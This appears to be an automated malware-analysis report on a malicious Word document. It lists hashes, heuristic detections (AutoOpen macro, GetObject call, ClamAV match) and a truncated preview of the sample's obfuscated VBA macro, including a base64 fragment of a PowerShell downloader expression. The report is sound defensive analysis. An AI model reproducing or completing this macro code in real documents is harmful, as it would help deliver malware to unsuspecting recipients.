Office (OLE) malware analysis — malicious · bbf554b9fb07d7fb

MALICIOUS

Office (OLE)

212.8 KB Created: 2019-03-15 14:12:00 Authoring application: Microsoft Office Word First seen: 2021-10-04

MD5: 5b5cac99ddee13315f7fd183106b6807 SHA-1: 8b4e5d1004cc868ae0294e92a0d3caea9011ffa5 SHA-256: bbf554b9fb07d7fb4b3bf21b4c53b1769b678d6bd5a3023c62e344b7ecbe07cb

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing VBA macros, specifically an AutoOpen macro that uses GetObject, indicating malicious intent. The ClamAV detection and heuristic firings strongly suggest this is a malicious downloader. No specific family could be identified due to the obfuscated nature of the VBA code.

Heuristics 6

ClamAV: Doc.Malware.Droo-6903173-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Droo-6903173-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53728 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	53728 bytes
SHA-256: `2e8762b0eeca2b77a3b247cef07d9d15eacd2f09dca11a193a09d9b5c1e25683`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "cU1A41_" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "iAAB4Dx" Function IZDBQ4() If HUoAQ4A = K1AUwB Then AooUUDA = 166657454 * vc1AQQ bB4CcAD = HABo1AAQ / 229126659 / 871723279 + 744152178 * 751445714 / 369718703 + (rDADAAZ - Tan(j1UQAAA + 345334324 - 605118741 - Oct(zBDABowB - Hex(908012061) + 176718505 + Oct(867800412))) + (159435008 / Sqr(773988887))) jA1AAA = 626271690 * zAAZAA End If If iBAwQo = fQUoZxoA Then hwADBBUD = 589448533 * RAwxAkAA n4ABGck = wA4QDQ1 / 237121252 / 984991603 + 50129568 * 829439565 / 174715579 + (z1UZoAo_ - Tan(JoAoQX + 590588858 - 260975432 - Oct(q_UDB_ - Hex(166904822) + 892765103 + Oct(440703508))) + (208463113 / Sqr(412832560))) rw11_AQ = 594016844 * d4_AU_A End If If dAAQAAC = p1BABA1 Then XB_BA1 = 804664163 * RQBcBAx mGAAAXA = dAD1kx / 261161455 / 418949576 + 256728713 * 28372168 / 979527069 + (lxD4AA - Tan(BkABBAB + 728813671 - 153013062 - Oct(OcwwDxUQ - Hex(718544484) + 409411168 + Oct(555708371))) + (978472189 / Sqr(125232786))) zADAAABB = 535168921 * mBcAUkQ End If If RQGAkAAU = ZA1AxXA Then mwGBoAA = 553401725 * FBDZwA DQBBxo = GAkA4wAD / 559772210 / 461089845 + 661221981 * 689421010 / 796261855 + (foQkCU - Tan(dAxAAB + 899664189 - 200044816 - Oct(w1DAkQoA - Hex(739571070) + 940689061 + Oct(769381057))) + (587394761 / Sqr(417213991))) Rwc_Qc = 555473500 * dAB_AQGA End If If iAA11AkB = pUkAAAA1 Then vAQXB1_ = 54284777 * U1B4wk1c axkXAA = pAAAAB / 767930234 / 864119435 + 840431413 * 233226221 / 431754384 + (DAAAZoQ - Tan(WGADDAGB + 48669113 - 704056661 - Oct(NA_ABA - Hex(837439844) + 345312132 + Oct(273457832))) + (63506446 / Sqr(534676408))) WBZQA1A_ = 980893528 * QDZoXAX End If If ZQAAAB = aAAA4x Then B_GAZAZ = 189146771 * Nko4Aw JAAX_AkU = dAUAAZU / 238704000 / 422465549 + 258105481 * 542824642 / 435685260 + (VA1cDAA - Tan(hBxXBxwG + 761678711 - 261653279 - Oct(zAAwDAA - Hex(804531362) + 410636096 + Oct(432513668))) + (746611890 / Sqr(875684361))) RAADoAoQ = 51709270 * PBwX4QXD End If If pXx1ACAA = kAX4QxDA Then QAAA_DG1 = 393714294 * mcAGAACD ZxBxcQAw = jUA4AkAA / 828860433 / 252002105 + 492418811 * 926866533 / 343564292 + (s_CDGkQ_ - Tan(fZA_BUDD + 5509470 - 55945585 - Oct(GQ14AQA - Hex(452017812) + 564040955 + Oct(686889086))) + (308731958 / Sqr(69954372))) RoAQDA = 665116046 * jZA1BUB End If If IAcADc = KAQBDUZA Then vooAQBU = 225307081 * YAoA_o1A WQUU1kc = fQA4Q_c / 351081868 / 244540235 + 891096719 * 145302277 / 45367667 + (SwQDwk - Tan(CcGcDZZ + 626514729 - 413852199 - Oct(tA1UAkB - Hex(488188406) + 524523816 + Oct(50894717))) + (538390704 / Sqr(611012899))) QAAQAA = 924833891 * YDCQkZ End If End Function Function SAAAAGQ() On Error Resume Next If qoDwUA1G = sGUQAo Then YU_ACX = 287750603 * wZA_UQGo tZZcAA = pUAAGUAA / 860658513 / 216377560 + 550350428 * 920997540 / 911945343 + (IDAAUX - Tan(ucAABc + 435878146 - 829466079 - Oct(WZQBQA - Hex(336909773) + 666144889 + Oct(759909822))) + (920899973 / Sqr(447037960))) LA1A4_AX = 564272179 * NXCGwCA End If If QA1G_UAZ = zAA4GAo_ Then QCoAAC = 501567366 * fDBDGcA wAkUkA = RACC1_ / 868780443 / 923753279 + 468127597 * 368909782 / 917221257 + (awckUAA - Tan(iAAoQXX4 + 837310715 - 960978303 - Oct(jDcAAAUA - Hex(217103481) + 629138258 + Oct(12126364))) + (766817359 / Sqr(381239177))) G4U1ck = 591079096 * HUAGAo End If Y_AA4DUA = "KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAg" If YADA1A = UQAABkG Then cAAUox = 258697236 * tGQQAC YwD4UZkA = YAADwc / 73812250 / 188096371 + 299720960 * 431728990 / 794459285 + (FBwXA4B - Tan(PAAAAUB + 414352560 - 121959079 ... (truncated)

SHA-256: 2e8762b0eeca2b77a3b247cef07d9d15eacd2f09dca11a193a09d9b5c1e25683

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "cU1A41_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iAAB4Dx"
Function IZDBQ4()
   If HUoAQ4A = K1AUwB Then
       AooUUDA = 166657454 * vc1AQQ
       bB4CcAD = HABo1AAQ / 229126659 / 871723279 + 744152178 * 751445714 / 369718703 + (rDADAAZ - Tan(j1UQAAA + 345334324 - 605118741 - Oct(zBDABowB - Hex(908012061) + 176718505 + Oct(867800412))) + (159435008 / Sqr(773988887)))
       jA1AAA = 626271690 * zAAZAA
End If
   If iBAwQo = fQUoZxoA Then
       hwADBBUD = 589448533 * RAwxAkAA
       n4ABGck = wA4QDQ1 / 237121252 / 984991603 + 50129568 * 829439565 / 174715579 + (z1UZoAo_ - Tan(JoAoQX + 590588858 - 260975432 - Oct(q_UDB_ - Hex(166904822) + 892765103 + Oct(440703508))) + (208463113 / Sqr(412832560)))
       rw11_AQ = 594016844 * d4_AU_A
End If
   If dAAQAAC = p1BABA1 Then
       XB_BA1 = 804664163 * RQBcBAx
       mGAAAXA = dAD1kx / 261161455 / 418949576 + 256728713 * 28372168 / 979527069 + (lxD4AA - Tan(BkABBAB + 728813671 - 153013062 - Oct(OcwwDxUQ - Hex(718544484) + 409411168 + Oct(555708371))) + (978472189 / Sqr(125232786)))
       zADAAABB = 535168921 * mBcAUkQ
End If
   If RQGAkAAU = ZA1AxXA Then
       mwGBoAA = 553401725 * FBDZwA
       DQBBxo = GAkA4wAD / 559772210 / 461089845 + 661221981 * 689421010 / 796261855 + (foQkCU - Tan(dAxAAB + 899664189 - 200044816 - Oct(w1DAkQoA - Hex(739571070) + 940689061 + Oct(769381057))) + (587394761 / Sqr(417213991)))
       Rwc_Qc = 555473500 * dAB_AQGA
End If
   If iAA11AkB = pUkAAAA1 Then
       vAQXB1_ = 54284777 * U1B4wk1c
       axkXAA = pAAAAB / 767930234 / 864119435 + 840431413 * 233226221 / 431754384 + (DAAAZoQ - Tan(WGADDAGB + 48669113 - 704056661 - Oct(NA_ABA - Hex(837439844) + 345312132 + Oct(273457832))) + (63506446 / Sqr(534676408)))
       WBZQA1A_ = 980893528 * QDZoXAX
End If
   If ZQAAAB = aAAA4x Then
       B_GAZAZ = 189146771 * Nko4Aw
       JAAX_AkU = dAUAAZU / 238704000 / 422465549 + 258105481 * 542824642 / 435685260 + (VA1cDAA - Tan(hBxXBxwG + 761678711 - 261653279 - Oct(zAAwDAA - Hex(804531362) + 410636096 + Oct(432513668))) + (746611890 / Sqr(875684361)))
       RAADoAoQ = 51709270 * PBwX4QXD
End If
   If pXx1ACAA = kAX4QxDA Then
       QAAA_DG1 = 393714294 * mcAGAACD
       ZxBxcQAw = jUA4AkAA / 828860433 / 252002105 + 492418811 * 926866533 / 343564292 + (s_CDGkQ_ - Tan(fZA_BUDD + 5509470 - 55945585 - Oct(GQ14AQA - Hex(452017812) + 564040955 + Oct(686889086))) + (308731958 / Sqr(69954372)))
       RoAQDA = 665116046 * jZA1BUB
End If
   If IAcADc = KAQBDUZA Then
       vooAQBU = 225307081 * YAoA_o1A
       WQUU1kc = fQA4Q_c / 351081868 / 244540235 + 891096719 * 145302277 / 45367667 + (SwQDwk - Tan(CcGcDZZ + 626514729 - 413852199 - Oct(tA1UAkB - Hex(488188406) + 524523816 + Oct(50894717))) + (538390704 / Sqr(611012899)))
       QAAQAA = 924833891 * YDCQkZ
End If
End Function
Function SAAAAGQ()
On Error Resume Next
If qoDwUA1G = sGUQAo Then
       YU_ACX = 287750603 * wZA_UQGo
       tZZcAA = pUAAGUAA / 860658513 / 216377560 + 550350428 * 920997540 / 911945343 + (IDAAUX - Tan(ucAABc + 435878146 - 829466079 - Oct(WZQBQA - Hex(336909773) + 666144889 + Oct(759909822))) + (920899973 / Sqr(447037960)))
       LA1A4_AX = 564272179 * NXCGwCA
End If
   If QA1G_UAZ = zAA4GAo_ Then
       QCoAAC = 501567366 * fDBDGcA
       wAkUkA = RACC1_ / 868780443 / 923753279 + 468127597 * 368909782 / 917221257 + (awckUAA - Tan(iAAoQXX4 + 837310715 - 960978303 - Oct(jDcAAAUA - Hex(217103481) + 629138258 + Oct(12126364))) + (766817359 / Sqr(381239177)))
       G4U1ck = 591079096 * HUAGAo
End If
Y_AA4DUA = "KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAg"
If YADA1A = UQAABkG Then
       cAAUox = 258697236 * tGQQAC
       YwD4UZkA = YAADwc / 73812250 / 188096371 + 299720960 * 431728990 / 794459285 + (FBwXA4B - Tan(PAAAAUB + 414352560 - 121959079
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.